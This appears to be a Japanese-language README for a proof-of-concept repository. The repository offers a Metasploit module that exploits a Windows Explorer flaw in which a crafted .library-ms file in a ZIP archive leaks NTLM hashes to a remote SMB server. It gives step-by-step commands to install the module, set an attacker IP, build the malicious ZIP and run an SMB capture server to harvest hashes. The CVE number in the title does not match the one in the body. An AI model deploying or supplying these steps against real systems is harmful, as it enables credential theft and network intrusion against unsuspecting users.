
CVE-2025-24054 用の POC
このリポジトリには、ZIP アーカイブから悪意のある .library-ms ファイルが展開されたときに NTLM ハッシュを漏えいさせる Windows Explorer の脆弱性 CVE-2025-24071 を悪用するための Metasploit モジュール が含まれています。
開発者: FOLKS-IWD
この脆弱性は、ユーザーが特別に細工された .library-ms ファイルを含む ZIP アーカイブを展開したときに発生します。Windows Explorer は、ファイル内で指定されたリモートサーバーに対して SMB 認証要求を自動的に開始し、ユーザーの操作なしに NTLM ハッシュを漏えいさせます。
この Metasploit モジュール:
.library-ms ファイルを生成します。
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Replace with your IP address
set FILENAME exploit.zip # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms # Name of the .library-ms file
set SHARE_NAME shared # SMB share name
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Same as ATTACKER_IP
run